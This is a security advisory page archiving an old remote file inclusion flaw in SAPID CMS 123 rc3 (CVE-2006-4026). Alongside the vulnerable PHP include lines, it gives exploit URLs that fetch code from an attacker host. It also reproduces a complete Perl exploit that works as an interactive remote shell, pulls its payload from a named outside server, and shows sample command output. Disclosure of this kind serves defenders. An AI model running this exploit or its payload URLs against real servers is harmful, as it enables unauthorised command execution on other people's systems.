SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   SAPID Vendors:   sapid.sourceforge.net
SAPID Include File Bugs in 'root_path' and 'GLOBALS[
SecurityTracker Alert ID:  1016650
SecurityTracker URL:  http://securitytracker.com/id/1016650
CVE Reference:   CVE-2006-4026   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 8 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 123 rc3
Description:   A vulnerability was reported in SAPID. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'root_path' and 'GLOBALS["root_path"]' parameters. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd

http://[target]/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd

Simo64 reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sapid.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SAPID CMS remote File Inclusion vulnerabilities

#########################################################################
# Title: SAPID CMS remote File Inclusion Vulnerabilities
#
# Author: Simo64 <simo64_at_morx_org>
# 
# Discovered: 06 Aout 2006
# 
# MorX Security Research Team
# 
# http://www.morx.org
# 
# Vendor : SAPID CMS
#
# Version : 123 rc3
# 
# Website : http://sapid.sourceforge.net
# 
# Severity: Critical
# 
# Details: 
# 
# 
# [+] Remote File Inclusion
# 
# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )
# 
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($root_path."usr/system/common_extfunctions.inc.php"); }
#
# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#
# $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files
# 
# [-] Exploit : 
# 
# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd
# 
# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd
#
#======================================
# Poc Remote Command Execution Exploit:
#======================================
#
# http://www.morx.org/sapid.txt
#
# C:\>perl sapid.pl http://127.0.0.1
#
# ===============================================================
# =  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  =
# ===============================================================
# =       MorX Security Research Team - www.morx.org            =
# =       Coded by Simo64 - simo64@www.morx.org                 =
# ===============================================================

# simo64@morx.org :~$ id; pwd; ls 
# uid=48(apache) gid=48(apache) groups=48(apache)
# get_calendar.inc.php
# get_filter_list.inc.php
# get_gb_records.inc.php
# get_infochannelfilter.inc.php
# get_infochannel.inc.php
# get_rss.inc.php
# get_searchresults.inc.php
# get_survey.inc.php
# get_track.inc.php
# get_tree.inc.php
# soap_call.inc.php
# /home/public_html/sapid/usr/extensions
# simo64@morx.org :~$ exit
#
# Enjoy !
#
#!/usr/bin/perl


use LWP::Simple;

print "\n===============================================================\n";
print "=  SAPID 123_rc3 (rootpath) Remote Command Execution Exploit  =\n";
print "===============================================================\n";
print "=       MorX Security Research Team - www.morx.org            =\n";
print "=       Coded by Simo64 - simo64\@www.morx.org                 =\n"; 
print "===============================================================\n\n";

my $targ,$rsh,$path,$con,$cmd,$data,$getit ;

$targ = $ARGV[0];
$rsh  = $ARGV[1];

if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}

if(!@ARGV) { &usage;exit(0);}

	chomp($targ);
    chomp($rsh);
    
	$path = $targ."/usr/extensions/get_infochannel.inc.php";
	$con  = get($path) || die "[-]Cannot connect to Host"; 

sub usage(){
	print "Usage    : perl $0 host/path [OPTION]\n\n";
	print "Exemples : perl $0 http://127.0.0.1\n";
	print "           perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";
	}

while ()  
{  
	 print "simo64\@morx.org :~\$ ";
	 chomp($cmd=<STDIN>);
     if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
     $getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
     $data=get($getit);
     if($cmd eq ""){ print "Please enter command !\n"; }
     else{ print $data ;}
}

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC